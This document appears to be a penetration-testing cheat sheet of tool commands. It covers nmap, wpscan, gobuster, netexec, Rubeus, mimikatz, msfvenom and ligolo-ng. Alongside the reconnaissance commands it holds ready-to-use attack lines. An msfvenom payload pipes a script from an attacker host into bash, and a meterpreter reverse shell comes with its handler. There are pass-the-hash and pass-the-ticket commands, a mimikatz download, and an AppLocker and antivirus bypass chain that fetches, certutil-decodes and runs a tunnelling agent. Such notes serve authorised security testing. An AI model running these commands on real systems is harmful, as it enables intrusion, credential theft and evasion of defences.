# Tools

# autorecon

# Basic usage

```bash
autorecon TARGET_IP
```

Scanning multiple hosts

```bash
autorecon -t targets.txt
# or, equivalently, run as root with explicit targets and verbose output
sudo $(which autorecon) TARGET_IP1 TARGET_IP2 TARGET_IP3 -vv
```

# nmap

### Base Syntax

```bash
nmap {Targets} [ScanType] [Options]
```

### Target

<table id="bkmrk-purpose-example-1-ta"><thead><tr><th>Purpose</th><th>Example</th></tr></thead><tbody><tr><td>1 target</td><td>`nmap IP`</td></tr><tr><td>Scan multiple targets (space-separated)</td><td>`nmap IP1 IP2 IP3`</td></tr><tr><td>Scan a list of targets from a file</td><td>`nmap -iL list.txt`</td></tr><tr><td>Scan a CIDR range</td><td>`nmap 192.168.1.0/24`</td></tr></tbody></table>

### Ports

<table id="bkmrk-purpose-example-scan"><thead><tr><th>Purpose</th><th>Example</th></tr></thead><tbody><tr><td>Scan the 1000 most common ports (default)</td><td>`nmap IP`</td></tr><tr><td>Port range</td><td>`nmap -p x-y IP`</td></tr><tr><td>Port list</td><td>`nmap -p x,y,z IP`</td></tr><tr><td>Scan ports in sequential order instead of randomised (`-r` only changes the order; `-p` still selects the ports)</td><td>`nmap -r -p x-y IP`</td></tr></tbody></table>

### Probing

<table id="bkmrk-purpose-example-don%27"><thead><tr><th>Purpose</th><th>Example</th></tr></thead><tbody><tr><td>Don't probe (treat every host as up)</td><td>`nmap IP -Pn`</td></tr><tr><td>Default probe</td><td>`nmap IP -PB`</td></tr><tr><td>ICMP Echo Request</td><td>`nmap IP -PE`</td></tr><tr><td>ICMP Timestamp Request</td><td>`nmap IP -PP`</td></tr><tr><td>ICMP Netmask (Address Mask) Request</td><td>`nmap IP -PM`</td></tr></tbody></table>

### Scan Type

<table id="bkmrk-purpose-example-prob"><thead><tr><th>Purpose</th><th>Example</th></tr></thead><tbody><tr><td>Probe only (host discovery, no port scan)</td><td>`nmap IP -sn`</td></tr><tr><td>SYN Scan</td><td>`nmap IP -sS`</td></tr><tr><td>TCP Connect Scan</td><td>`nmap IP -sT`</td></tr><tr><td>UDP Scan</td><td>`nmap IP -sU`</td></tr><tr><td>Version scan</td><td>`nmap IP -sV`</td></tr><tr><td>OS Detection</td><td>`nmap IP -O`</td></tr><tr><td>Set custom TCP flags (any combination of URG, ACK, PSH, RST, SYN, FIN)</td><td>`nmap IP --scanflags SYNFIN`</td></tr></tbody></table>

### Timing Options

<table id="bkmrk-purpose-example-para"><thead><tr><th>Purpose</th><th>Example</th></tr></thead><tbody><tr><td>Paranoid</td><td>`nmap IP -T0`</td></tr><tr><td>Sneaky</td><td>`nmap IP -T1`</td></tr><tr><td>Polite</td><td>`nmap IP -T2`</td></tr><tr><td>Normal</td><td>`nmap IP -T3`</td></tr><tr><td>Aggressive</td><td>`nmap IP -T4`</td></tr><tr><td>Insane</td><td>`nmap IP -T5`</td></tr></tbody></table>

### Output Format

<table id="bkmrk-purpose-example-stan"><thead><tr><th>Purpose</th><th>Example</th></tr></thead><tbody><tr><td>Standard</td><td>`nmap IP -oN file.txt`</td></tr><tr><td>Greppable</td><td>`nmap IP -oG file.txt`</td></tr><tr><td>XML</td><td>`nmap IP -oX file.txt`</td></tr><tr><td>all formats</td><td>`nmap IP -oA file`</td></tr></tbody></table>

### Misc Options

<table id="bkmrk-purpose-example-aggr"><thead><tr><th>Purpose</th><th>Example</th></tr></thead><tbody><tr><td>Aggressive scan (OS detection, version detection, script scanning and traceroute)</td><td>`nmap IP -A`</td></tr><tr><td>Show the reason why a port is in a given state</td><td>`nmap IP --reason`</td></tr></tbody></table>

# wpscan

# Basic usage

```bash
wpscan --url http://TARGET_IP
```

Scan for plugins

```bash
wpscan --url http://TARGET_IP -e p
```

Scan for users

```bash
wpscan --url http://TARGET_IP -e u
```

Scan for vulnerable plugins

```bash
wpscan --url http://TARGET_IP -e vp
```

Brute force passwords

```bash
wpscan --url http://TARGET_IP --passwords /usr/share/wordlists/rockyou.txt
```

# ffuf

# Basic Usage

```bash
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET_IP:PORT/FUZZ
```

# nikto

# Basic usage

```bash
nikto -host http://TARGET_IP -p PORT
```

# gobuster

# Basic usage

```bash
gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
```

Enumerating with extensions (choose the extensions to match the target's stack)

```bash
gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,py,html,aspx
```

Enumerating vhosts (after updating `/etc/hosts`)

```bash
gobuster vhost -u http://hostname.domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
```

# netexec

# Enumeration

## SMB

```bash
netexec smb targets.txt -u user_name -H 'NTLM_HASH'
```

```bash
netexec smb TARGET_IP -u user_name -H 'NTLM_HASH' --groups --local-groups --loggedon-users --rid-brute --users --shares --pass-pol
```

## winrm

```bash
netexec winrm targets.txt -u user_name -H 'NTLM_HASH'
```

# powerview

### 1. Enumerate common names

```powershell
Get-DomainComputer | select cn
```

# msf

# Linux payloads

## With commands

```bash
msfvenom -p linux/x64/exec CMD='echo I love programming. && curl http://YOUR_IP/shell.php | bash' -f elf -o shellme.elf
```

# Windows

```bash
# the payload must match the handler below (x64 meterpreter, reverse TCP, port 443)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp > payload.c
```

Catch with

```bash
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443; set exitfunc thread; exploit -j"
```

# rubeus

```powershell
Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt
```

# powersploit

Reset a user’s password

```powershell
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword
```

# mimikatz

You will need to upload the binaries to the target first, either via a meterpreter session or PowerShell:

## meterpreter

```bash
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys
```

## powershell

```powershell
powershell -ep bypass -c iwr http://YOUR_IP/mimikatz.exe -o .\mimikatz.exe
powershell -ep bypass -c iwr http://YOUR_IP/mimidrv.sys -o .\mimidrv.sys
```

# ligolo-ng

<p class="callout warning">You can use the standard apt repos if you don't need to make any modifications, e.g. for bypassing AppLocker or CLM.</p>

```bash
sudo apt install ligolo-ng ligolo-ng-common-binaries -y
```

# Basic tunnel

1. Start `ligolo-proxy`

    ```bash
    sudo ligolo-proxy -selfcert
    ```
2. Connect the agent
3. Enter the session and list the network configuration

    ```bash
    # in the ligolo-ng proxy console
    session
    ifconfig
    ```
4. Set the route

    1. 1 hop

        ```bash
        autoroute
        start
        ```
    2. 2 hops

## AV evasion

1. Clone the repository
    
    ```powershell
    git clone https://github.com/nicocha30/ligolo-ng.git
    ```
2. Edit the `ignoreCertificate` and `serverAddr` variables in `ligolo-ng/cmd/agent/main.go`
3. Compile the `agent.exe` using the following command
    
    ```bash
    GOOS=windows go build -o agent.exe cmd/agent/main.go
    ```
4. Compile as `x64` and give the name `ApplockerBypassExternalBinary.exe` - [Github Repo](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/06.applocker/ApplockerBypassExternalBinary)
5. Encode the file created above with certutil
    
    ```powershell
    certutil.exe -encode .\ApplockerBypassExternalBinary.exe AppLockerBypassLigolo.txt
    ```
6. Rename the `agent.exe` to `ligolo-agent.exe`
7. Serve the files (`ligolo-agent.exe` and `AppLockerBypassLigolo.txt`)
8. Upload the files to the target
    
    ```powershell
    cmd.exe /c curl http://YOUR_IP/ligolo-agent.exe -o C:\users\public\try-agent.exe && curl http://YOUR_IP/AppLockerBypassLigolo.txt -o C:\users\public\enc.txt && certutil -decode C:\users\public\enc.txt C:\users\public\ligolo.exe && del C:\users\public\enc.txt && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=true /U C:\users\public\ligolo.exe
    ```